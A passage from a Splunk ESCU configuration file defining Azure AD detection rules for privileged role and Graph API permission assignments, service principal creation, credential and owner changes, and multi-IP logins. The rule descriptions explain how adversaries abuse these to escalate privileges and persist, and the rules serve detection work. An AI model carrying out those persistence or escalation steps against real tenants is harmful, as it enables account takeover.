["T1003.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the assignment of the Privileged Authentication Administrato role to an Azure AD user. Users in this role can set or reset authentication methods for any user in Azure Active Directory, including privileged roles like Global Administrators. Users with this role can change credentials for people who may have access to sensitive or private information or critical configuration inside and outside of Azure Active Directory. Changing the credentials of a user may mean the ability to assume that users identity and permissions. Red teams and adversaries alike may abuse this role to escalate their privileges. action.notable.param.rule_title = Azure AD Privileged Authentication Administrator Role Assigned action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` "operationName"="Add member to role" "properties.targetResources{}.modifiedProperties{}.newValue"="\"Privileged Authentication Administrator\"" | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by initiatedBy, result, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_privileged_authentication_administrator_role_assigned_filter` [ESCU - Azure AD Privileged Graph API Permission Assigned - Rule] action.escu = 0 action.escu.enabled = 1 description = This Splunk analytic flags the assignment of three high-risk Graph API permissions in Azure AD, Application.ReadWrite.All (1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9), AppRoleAssignment.ReadWrite.All (06b708a9-e830-4db3-a914-8e69da51d44f), and RoleManagement.ReadWrite.Directory (9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8). These permissions enable broad control over Azure AD, including application and directory settings. Utilizing azure_monitor_aad data, the query scans AuditLogs for 'Update application' operations, identifying when these permissions are assigned. It collects data on user, object, and user agent. Immediate attention is needed upon detection, as misuse of these permissions can lead to unauthorized Azure AD modifications and potential security breaches. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This Splunk analytic flags the assignment of three high-risk Graph API permissions in Azure AD, Application.ReadWrite.All (1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9), AppRoleAssignment.ReadWrite.All (06b708a9-e830-4db3-a914-8e69da51d44f), and RoleManagement.ReadWrite.Directory (9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8). These permissions enable broad control over Azure AD, including application and directory settings. Utilizing azure_monitor_aad data, the query scans AuditLogs for 'Update application' operations, identifying when these permissions are assigned. It collects data on user, object, and user agent. Immediate attention is needed upon detection, as misuse of these permissions can lead to unauthorized Azure AD modifications and potential security breaches. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. action.escu.known_false_positives = Privileged Graph API permissions may be assigned for legitimate purposes. Filter as needed. action.escu.creation_date = 2024-01-30 action.escu.modification_date = 2024-01-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Privileged Graph API Permission Assigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = User $user$ assigned privileged Graph API permissions to $object$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Privileged Graph API Permission Assigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This Splunk analytic flags the assignment of three high-risk Graph API permissions in Azure AD, Application.ReadWrite.All (1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9), AppRoleAssignment.ReadWrite.All (06b708a9-e830-4db3-a914-8e69da51d44f), and RoleManagement.ReadWrite.Directory (9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8). These permissions enable broad control over Azure AD, including application and directory settings. Utilizing azure_monitor_aad data, the query scans AuditLogs for 'Update application' operations, identifying when these permissions are assigned. It collects data on user, object, and user agent. Immediate attention is needed upon detection, as misuse of these permissions can lead to unauthorized Azure AD modifications and potential security breaches. action.notable.param.rule_title = Azure AD Privileged Graph API Permission Assigned action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=AuditLogs operationName="Update application" | eval newvalue = mvindex('properties.targetResources{}.modifiedProperties{}.newValue',0) | spath input=newvalue | search "{}.RequiredAppPermissions{}.EntitlementId"="1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9" OR "{}.RequiredAppPermissions{}.EntitlementId"="06b708a9-e830-4db3-a914-8e69da51d44f" OR "{}.RequiredAppPermissions{}.EntitlementId"="9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8" | eval Permissions = '{}.RequiredAppPermissions{}.EntitlementId' | stats count earliest(_time) as firstTime latest(_time) as lastTime values(Permissions) by user, object, user_agent, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_privileged_graph_api_permission_assigned_filter` [ESCU - Azure AD Privileged Role Assigned - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the assignment of sensitive and privileged Azure Active Directory roles to an Azure AD user. Adversaries and red teams alike may assign these roles to a compromised account to establish Persistence in an Azure AD environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the assignment of sensitive and privileged Azure Active Directory roles to an Azure AD user. Adversaries and red teams alike may assign these roles to a compromised account to establish Persistence in an Azure AD environment. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. action.escu.known_false_positives = Administrators will legitimately assign the privileged roles users as part of administrative tasks. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Privileged Role Assigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = A privileged Azure AD role was assigned for User $user$ initiated by $initiatedBy$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Privileged Role Assigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the assignment of sensitive and privileged Azure Active Directory roles to an Azure AD user. Adversaries and red teams alike may assign these roles to a compromised account to establish Persistence in an Azure AD environment. action.notable.param.rule_title = Azure AD Privileged Role Assigned action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` "operationName"="Add member to role" | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.modifiedProperties{}.newValue as roles | eval role=mvindex(roles,1) | lookup privileged_azure_ad_roles azureadrole AS role OUTPUT isprvilegedadrole description | search isprvilegedadrole = True | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by initiatedBy, result, operationName, role, description | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_privileged_role_assigned_filter` [ESCU - Azure AD Privileged Role Assigned to Service Principal - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects potential privilege escalation threats in Azure Active Directory (AD). The detection is made by running a specific search within the ingested Azure Active Directory events to leverage the AuditLogs log category. This detection is important because it identifies instances where privileged roles that hold elevated permissions are assigned to service principals. This prevents unauthorized access or malicious activities, which occur when these non-human entities access Azure resources to exploit them. False positives might occur since administrators can legitimately assign privileged roles to service principals. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects potential privilege escalation threats in Azure Active Directory (AD). The detection is made by running a specific search within the ingested Azure Active Directory events to leverage the AuditLogs log category. This detection is important because it identifies instances where privileged roles that hold elevated permissions are assigned to service principals. This prevents unauthorized access or malicious activities, which occur when these non-human entities access Azure resources to exploit them. False positives might occur since administrators can legitimately assign privileged roles to service principals. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. action.escu.known_false_positives = Administrators may legitimately assign the privileged roles to Service Principals as part of administrative tasks. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Privileged Role Assigned to Service Principal - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Privilege Escalation", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = A privileged Azure AD role was assigned to the Service Principal $displayName$ initiated by $initiatedBy$ action.risk.param._risk = [{"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Privileged Role Assigned to Service Principal - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Privilege Escalation", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects potential privilege escalation threats in Azure Active Directory (AD). The detection is made by running a specific search within the ingested Azure Active Directory events to leverage the AuditLogs log category. This detection is important because it identifies instances where privileged roles that hold elevated permissions are assigned to service principals. This prevents unauthorized access or malicious activities, which occur when these non-human entities access Azure resources to exploit them. False positives might occur since administrators can legitimately assign privileged roles to service principals. action.notable.param.rule_title = Azure AD Privileged Role Assigned to Service Principal action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Add member to role" | rename properties.* as * | search "targetResources{}.type"=ServicePrincipal | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.modifiedProperties{}.newValue as roles | eval role=mvindex(roles,1) | rename targetResources{}.displayName as apps | eval displayName=mvindex(apps,0) | lookup privileged_azure_ad_roles azureadrole AS role OUTPUT isprvilegedadrole description | search isprvilegedadrole = True | stats count min(_time) as firstTime max(_time) as lastTime values(displayName) as displayName by initiatedBy, result, operationName, role | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_privileged_role_assigned_to_service_principal_filter` [ESCU - Azure AD Service Principal Authentication - Rule] action.escu = 0 action.escu.enabled = 1 description = Monitoring service principal authentication events in Azure Active Directory is crucial, but to effectively leverage this detection, teams should first conduct a thorough inventory of all service principals and their source IPs to establish a baseline of normal behavior. The detection, using azure_monitor_aad, specifically targets "Sign-in activity" within ServicePrincipalSignInLogs, gathering key details like sign-in frequency, timing, source IPs, and accessed resources. This baseline is essential for SOC teams to distinguish between regular application authentication and anomalous patterns that might suggest compromised credentials or malicious activities. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = Monitoring service principal authentication events in Azure Active Directory is crucial, but to effectively leverage this detection, teams should first conduct a thorough inventory of all service principals and their source IPs to establish a baseline of normal behavior. The detection, using azure_monitor_aad, specifically targets "Sign-in activity" within ServicePrincipalSignInLogs, gathering key details like sign-in frequency, timing, source IPs, and accessed resources. This baseline is essential for SOC teams to distinguish between regular application authentication and anomalous patterns that might suggest compromised credentials or malicious activities. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category. action.escu.known_false_positives = Service Principals will legitimally authenticate remotely to your tenant. Implementing this detection after establishing a baseline enables a more accurate identification of security threats, ensuring proactive and informed responses to safeguard the Azure AD environment. source ips. action.escu.creation_date = 2024-02-12 action.escu.modification_date = 2024-02-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Service Principal Authentication - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = Service Principal $user$ authenticated from $src_ip$ action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Service Principal Authentication - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Monitoring service principal authentication events in Azure Active Directory is crucial, but to effectively leverage this detection, teams should first conduct a thorough inventory of all service principals and their source IPs to establish a baseline of normal behavior. The detection, using azure_monitor_aad, specifically targets "Sign-in activity" within ServicePrincipalSignInLogs, gathering key details like sign-in frequency, timing, source IPs, and accessed resources. This baseline is essential for SOC teams to distinguish between regular application authentication and anomalous patterns that might suggest compromised credentials or malicious activities. action.notable.param.rule_title = Azure AD Service Principal Authentication action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Sign-in activity" category=ServicePrincipalSignInLogs | rename properties.* as * | stats count earliest(_time) as firstTime latest(_time) as lastTime by user, user_id, src_ip, resourceDisplayName, resourceId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_service_principal_authentication_filter` [ESCU - Azure AD Service Principal Created - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the creation of a Service Principal in an Azure AD environment. An Azure Service Principal is an identity designed to be used with applications, services, and automated tools to access resources. It is similar to a service account within an Active Directory environment. Service Principal authentication does not support multi-factor authentication nor conditional access policies. Adversaries and red teams alike who have obtained administrative access may create a Service Principal to establish Persistence and obtain single-factor access to an Azure AD environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the creation of a Service Principal in an Azure AD environment. An Azure Service Principal is an identity designed to be used with applications, services, and automated tools to access resources. It is similar to a service account within an Active Directory environment. Service Principal authentication does not support multi-factor authentication nor conditional access policies. Adversaries and red teams alike who have obtained administrative access may create a Service Principal to establish Persistence and obtain single-factor access to an Azure AD environment. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment thorough an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. action.escu.known_false_positives = Administrator may legitimately create Service Principal. Filter as needed. action.escu.creation_date = 2022-08-17 action.escu.modification_date = 2022-08-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Service Principal Created - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = Service Principal named $displayName$ created by $user$ action.risk.param._risk = [{"risk_object_field": "displayName", "risk_object_type": "other", "risk_score": 45}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Service Principal Created - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the creation of a Service Principal in an Azure AD environment. An Azure Service Principal is an identity designed to be used with applications, services, and automated tools to access resources. It is similar to a service account within an Active Directory environment. Service Principal authentication does not support multi-factor authentication nor conditional access policies. Adversaries and red teams alike who have obtained administrative access may create a Service Principal to establish Persistence and obtain single-factor access to an Azure AD environment. action.notable.param.rule_title = Azure AD Service Principal Created action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Add service principal" properties.initiatedBy.user.id=* | rename properties.* as * | rename targetResources{}.displayName as displayName | rename targetResources{}.type as type | stats count min(_time) as firstTime max(_time) as lastTime values(displayName) as displayName by type, user, result, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_service_principal_created_filter` [ESCU - Azure AD Service Principal New Client Credentials - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the addition of new credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD. These credentials include both x509 certificates and passwords. With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules. Adversaries and red teams alike who have obtained privileged access to Azure AD may add credentials to Service Principals to maintain persistent access to victim accounts and other instances within the Azure environment. By compromising an account who is an Owner of an application with privileged access, attackers may also escalate their privileges in an Azure AD environment by adding new credentials and logging in as the service principal. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the addition of new credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD. These credentials include both x509 certificates and passwords. With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules. Adversaries and red teams alike who have obtained privileged access to Azure AD may add credentials to Service Principals to maintain persistent access to victim accounts and other instances within the Azure environment. By compromising an account who is an Owner of an application with privileged access, attackers may also escalate their privileges in an Azure AD environment by adding new credentials and logging in as the service principal. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Signin log category. action.escu.known_false_positives = Service Principal client credential modifications may be part of legitimate administrative operations. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Service Principal New Client Credentials - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence", "Azure Active Directory Privilege Escalation", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = New credentials added for Service Principal $properties.targetResources{}.displayName$ action.risk.param._risk = [{"risk_object_field": "displayName", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Service Principal New Client Credentials - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "Azure Active Directory Privilege Escalation", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the addition of new credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD. These credentials include both x509 certificates and passwords. With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules. Adversaries and red teams alike who have obtained privileged access to Azure AD may add credentials to Service Principals to maintain persistent access to victim accounts and other instances within the Azure environment. By compromising an account who is an Owner of an application with privileged access, attackers may also escalate their privileges in an Azure AD environment by adding new credentials and logging in as the service principal. action.notable.param.rule_title = Azure AD Service Principal New Client Credentials action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=AuditLogs operationName="Update application*Certificates and secrets management " | rename properties.* as * | rename targetResources{}.* as * | stats count min(_time) as firstTime max(_time) as lastTime values(displayName) as displayName by user, modifiedProperties{}.newValue, src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_service_principal_new_client_credentials_filter` [ESCU - Azure AD Service Principal Owner Added - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the addition of a new owner for a Service Principal within an Azure AD tenant. An Azure Service Principal is an identity designed to be used with applications, services, and automated tools to access resources. It is similar to a service account within an Active Directory environment. Service Principal authentication does not support multi-factor authentication nor conditional access policies. Adversaries and red teams alike who have obtained administrative access may add a new owner for an existing Service Principal to establish Persistence and obtain single-factor access to an Azure AD environment. Attackers who are looking to escalate their privileges by leveraging a Service Principals permissions may also add a new owner. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the addition of a new owner for a Service Principal within an Azure AD tenant. An Azure Service Principal is an identity designed to be used with applications, services, and automated tools to access resources. It is similar to a service account within an Active Directory environment. Service Principal authentication does not support multi-factor authentication nor conditional access policies. Adversaries and red teams alike who have obtained administrative access may add a new owner for an existing Service Principal to establish Persistence and obtain single-factor access to an Azure AD environment. Attackers who are looking to escalate their privileges by leveraging a Service Principals permissions may also add a new owner. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. action.escu.known_false_positives = Administrator may legitimately add new owners for Service Principals. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Service Principal Owner Added - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence", "Azure Active Directory Privilege Escalation", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = A new owner was added for service principal $displayName$ by $initiatedBy$ action.risk.param._risk = [{"risk_object_field": "displayName", "risk_object_type": "other", "risk_score": 54}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Service Principal Owner Added - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "Azure Active Directory Privilege Escalation", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the addition of a new owner for a Service Principal within an Azure AD tenant. An Azure Service Principal is an identity designed to be used with applications, services, and automated tools to access resources. It is similar to a service account within an Active Directory environment. Service Principal authentication does not support multi-factor authentication nor conditional access policies. Adversaries and red teams alike who have obtained administrative access may add a new owner for an existing Service Principal to establish Persistence and obtain single-factor access to an Azure AD environment. Attackers who are looking to escalate their privileges by leveraging a Service Principals permissions may also add a new owner. action.notable.param.rule_title = Azure AD Service Principal Owner Added action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Add owner to application" | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.userPrincipalName as newOwner | rename targetResources{}.modifiedProperties{}.newValue as displayName | eval displayName = mvindex(displayName,1) | where initiatedBy!=newOwner | stats count min(_time) as firstTime max(_time) as lastTime values(displayName) as displayName by initiatedBy, result, operationName, newOwner | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_service_principal_owner_added_filter` [ESCU - Azure AD Successful Authentication From Different Ips - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an Azure AD account successfully authenticating from more than one unique Ip address in the span of 30 minutes. This behavior could represent an adversary who has stolen credentials via a phishing attack or some other method and using them to access corporate online resources around the same time as a legitimate user. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.001", "T1110.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an Azure AD account successfully authenticating from more than one unique Ip address in the span of 30 minutes. This behavior could represent an adversary who has stolen credentials via a phishing attack or some other method and using them to access corporate online resources around the same time as a legitimate user. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Signin log category. action.escu.known_false_positives = A user with successful authentication events from different Ips may also represent the legitimate use of more than one device. Filter as needed and/or customize the threshold to fit your environment. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Successful Authentication From Different Ips - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Compromised User Account", "Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ has had successful authentication events from more than one unique IP address in the span of 30 minutes. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, 